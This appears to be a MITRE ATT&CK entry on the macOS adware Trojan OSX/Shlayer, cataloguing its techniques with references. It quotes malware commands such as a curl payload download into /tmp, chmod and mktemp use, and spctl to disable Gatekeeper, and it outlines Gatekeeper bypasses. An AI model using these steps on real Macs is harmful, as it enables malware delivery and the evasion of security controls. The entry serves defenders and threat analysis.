S0402 OSX/Shlayer
OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.12
| Item | Value |
|---|---|
| ID | S0402 |
| Associated Names | Zshlayer, Crossrider |
| Type | MALWARE |
| Version | 1.3 |
| Created | 29 August 2019 |
| Last Modified | 19 October 2022 |
| Navigation Layer | View In ATT&CK® Navigator |
Associated Software Descriptions
| Name | Description |
|---|---|
| Zshlayer | 3 |
| Crossrider | 54 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1548 | Abuse Elevation Control Mechanism | - |
| enterprise | T1548.004 | Elevated Execution with Prompt | OSX/Shlayer can escalate privileges to root by asking the user for credentials.1 |
| enterprise | T1176 | Browser Extensions | OSX/Shlayer can install malicious Safari browser extensions to serve ads.54 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.004 | Unix Shell | OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381… to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL “$url” >$tmp_path command to download malicious payloads into a temporary directory.1369 |
| enterprise | T1140 | Deobfuscate/Decode Files or Information | OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads.1 Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.36 |
| enterprise | T1083 | File and Directory Discovery | OSX/Shlayer has used the command appDir=”$(dirname $(dirname “$currentDir”))” and $(dirname “$(pwd -P)”) to construct installation paths.36 |
| enterprise | T1222 | File and Directory Permissions Modification | - |
| enterprise | T1222.002 | Linux and Mac File and Directory Permissions Modification | OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.6110 |
| enterprise | T1564 | Hide Artifacts | OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=”$(mktemp -d /tmp/XXXXXXXXXXXX)” or mktemp -t Installer.3610 |
| enterprise | T1564.001 | Hidden Files and Directories | OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.1 |
| enterprise | T1564.009 | Resource Forking | OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.78 |
| enterprise | T1105 | Ingress Tool Transfer | OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL “$url” >$tmp_path command to download malicious payloads into a temporary directory.1369 |
| enterprise | T1036 | Masquerading | - |
| enterprise | T1036.005 | Match Legitimate Name or Location | OSX/Shlayer can masquerade as a Flash Player update.12 |
| enterprise | T1553 | Subvert Trust Controls | - |
| enterprise | T1553.001 | Gatekeeper Bypass | If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.1109 |
| enterprise | T1082 | System Information Discovery | OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.13 |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.002 | Malicious File | OSX/Shlayer has relied on users mounting and executing a malicious DMG file.12 |
References
-
Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. ↩↩↩↩↩↩↩↩↩↩↩
-
Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019. ↩↩↩
-
Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021. ↩↩↩↩↩↩↩
-
Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019. ↩↩
-
Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019. ↩↩
-
Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. ↩↩↩↩↩↩
-
Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021. ↩
-
Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021. ↩
-
Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code …now notarized!? #2020. Retrieved September 13, 2021. ↩↩↩
-
Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021. ↩↩↩